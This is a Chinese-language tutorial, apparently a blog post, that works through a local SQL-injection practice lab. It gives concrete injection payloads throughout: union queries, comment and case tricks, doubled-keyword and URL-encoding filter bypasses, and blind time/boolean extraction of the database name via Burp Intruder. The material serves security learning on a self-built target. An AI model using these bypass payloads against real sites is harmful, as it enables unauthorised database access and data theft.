★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
先确认是否可以SQL注入,使用单双引号,1/0,括号测试 ’ " 1/0 ),页面显示不同内容或响应长度来确定。存在SQL注入后则开始构造轮子进行验证,猜出数据库,用户名,表名,字段名,有没有文件漏洞等。
为方便验证提交拦截到BP,右击到Repeater修改参数值进行验证看响应内容。
特殊字符说明
+表示空格
--表示注释
复制sqli-bypass压缩包到sqli项目下,解压并重命名为bypass,其中里面的数据库dvwa
,请参考《靶场环境搭建【XP、pikachu、dvwa、sqli-labs】》的dvwa
,启动小皮的Apache和MySQL服务。
正常响应值
在参数后面拼接上单引号'
发现响应长度有变化,拼接上两个单引号又正常响应长和回显了,因此存在SQL注入。
还有一种方式,就是在知道源码的情况下,可以把语句复制到mysql数据库编辑器比如navcat,去查询,构造确认这样更方便理解SQL注入为什么是这么拼的。
由此说明参数是有单引号闭合的,看源码也可确定是单引号包含着,这个是注入构造语句的关键点
使用order by 数字来确定回显字段,发现提示:请勿SQL注入!!!
,应该是空格被过滤了
# 注入语句
?id=1+order+by+5--+
使用注释方式/**/
拼接看,发现可正常显示,把列数调整到10发现,不回显,不报错,可能是列数不到10,往下调到8正常显示,因此可确定查询的列数是8
# 正常显示
?id=1'/**/order/**/by/**/5%23
# 10列不显示
?id=1'/**/order/**/by/**/10%23
# 8列正常显示,
?id=1'/**/order/**/by/**/10%23
使用union来确定显示的是哪个列,注意查询参数要不存在的,否则显示是存在的数据,确定显示的列数是第4,5列
?id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,8/**/'
把第4,5列依次替换成数据名,当前登录名
?id=-1'/**/union/**/select/**/1,2,3,database(),user(),6,7,8/**/'
同1、index1
看源码是过滤了关键字:and
和or
,同时错误信息不回显出来,所以是盲注,在确定列数时使用order
,尝试用大小写 oRder
# 10列不显示信息,往下调整到8正常显示
?id=1'+oRder+by+10--+'
?id=1'+oRder+by+8--+'
判断哪第几列对应显示,使用union,由于跟index1查相同的列,是第4,5列
# 注入语句
?id=-1'+union+select+1,2,3,4,5,6,7,8--+'
# 关键显示信息
Your Login name:4
Your Password:5
把第4,5列依次替换成数据名,当前登录名
# 注入语句
?id=-1'+union+select+1,2,3,database(),user(),6,7,8--+'
# 关键显示信息
Your Login name:dvwa
Your Password:root@localhost
同1、index1
该示例还是可以用order by 的方式来确认查询的列数,再用union联合查询的方式来爆出数据库名,但想用其他方式来验证知识点,所以用下面的方式。
看源码是过滤了关键字:and
和or
,同时错误信息不回显出来,使用时间盲注来爆破数据库
关键字过滤绕过,尝试采用重复的方式处理
anandd --> and
# 注入语句
?id=1'+anandd+if(1=1,sleep(1),sleep(2))--+'
# 输入内容
?id=1'+anandd+if(length(database())=2,1,0)--+'
在Repeater右击发送到Intruder,先清除默认的标志位,自己定位到数字2,这个值任意填写的。Attack Type选择:Sniper,参数设置看截图说明。
设置Payloads参数
从爆破结果得到数据库长度是4
# 输入内容
?id=1'+anandd+if(substr(database(),1,1)='a',1,0)--+'
爆破参数设置看截图说明,需要2个参数,第一个是截取的数据库对应的字段索引,第二个是匹配的内容。
从爆破结果得到数据库名是dvwa
同1、index1,只是index4报错信息有抛出来,更方便定位问题。
看源码是过滤了关键字:and
和or
,错误信息有回显出来,使用时间盲注来爆破数据库
关键字过滤绕过,尝试采用重复的方式处理
anandd --> and
# 注入语句
?id=1'+anandd+if(1=1,sleep(1),sleep(2))--+'
看源码是在取参数时有做urldecode,所以尝试使用&&替换and方式,再使用在线URL编码工具进行编码
在线编码解码网址:https://www.gjk.cn/urlencode
# 编码前的poc
1'+&&+if(1=1,sleep(1),sleep(2))--+'
# 编码后的poc
1%27%2B%26%26%2Bif%281%3D1%2Csleep%281%29%2Csleep%282%29%29--%2B%27
注意:POC复制到URL那边是接到?id=
后面,执行后,发现可行
# 编码前的poc,注意X是为了方便编码后定位打标识
1'+&&+if(length(database())=X,1,0)--+'
#编码后的poc
1%27%2B%26%26%2Bif%28length%28database%28%29%29%3DX%2C1%2C0%29--%2B%27
注意:POC复制到URL那边是接到?id=
后面
在Repeater右击发送到Intruder,先清除默认的标志位,自己定位到数字X,这个值任意填写的。Attack Type选择:Sniper,参数打标识如下
设置Payloads参数、分析攻击结果和第3.3关一样的,我就不再截图了。爆出结果数据库长度是4。
# 编码前的poc,注意X,Y是为了方便编码后定位打标识
1'+&&+if(substr(database(),X,1)='Y',1,0)--+'
#编码后的poc
1%27%2B%26%26%2Bif%28substr%28database%28%29%2CX%2C1%29%3D%27Y%27%2C1%2C0%29--%2B%27
注意:POC复制到URL那边是接到?id=
后面,
爆破参数设置看截图说明,需要2个参数,第一个X是截取的数据库对应的字段索引,第二个Y是匹配的内容。
设置Payloads参数、分析攻击结果和第3.4关一样的,我就不再截图了。从爆破结果得到数据库名是dvwa
。
同1、index1,不过index5报错信息也有抛出来,更方便定位问题。
看源码是过滤了很多关键字,错误信息有回显出来,使用时间盲注来爆破数据库
关键字过滤绕过,尝试采用重复的方式处理,成功了
anandd --> and
# 注入语句
?id=1'+anandd+if(1=1,sleep(1),sleep(2))--+'
# 尝试使用POC
?id=1'+anandd+if(length(database())=2,1,0)--+'
发现有报错信息,从报错信息分析出来database()
和=
都被过滤掉了,尝试替换如下
database() --> schema()
# 看源码in也被过滤了,所以用between 4 and 4 来等价 =4 ,由于and也会被过滤,同上面一样采用双写的方式
= 4 --> between 4 anandd 4
# 因此最终可行的POC
?id=1'+anandd+if(length(schema())+between+4+anandd+4,1,0)--+'
在Repeater右击发送到Intruder,先清除默认的标志位,自己定位到两个数字4,这个值任意填写的。Attack Type选择:Pitchfork,参数设置看截图说明。
# 尝试使用POC
?id=1'+anandd+if(substr(schema(),1,1)+between+'a'+anandd+'a',1,0)--+'
发现有报错信息,从报错信息分析出来substr()
被过滤掉了,因为上一步骤现在变化点就是函数substr()
,尝试使用mid()
替换,发现可以,没有报错信息了
# 尝试使用POC
?id=1'+anandd+if(mid(schema(),1,1)+between+'a'+anandd+'a',1,0)--+'
爆破参数设置看截图说明,需要2个参数,第一个是截取的数据库对应的字段索引,第二个是匹配的内容。
如果需要sqli-bypass压缩包,请关注我的公众号:大象只为你,回复关键字:bypass靶场。
下期内容将会分享文件上传相关的内容,敬请关注我的公众号,持续更新中…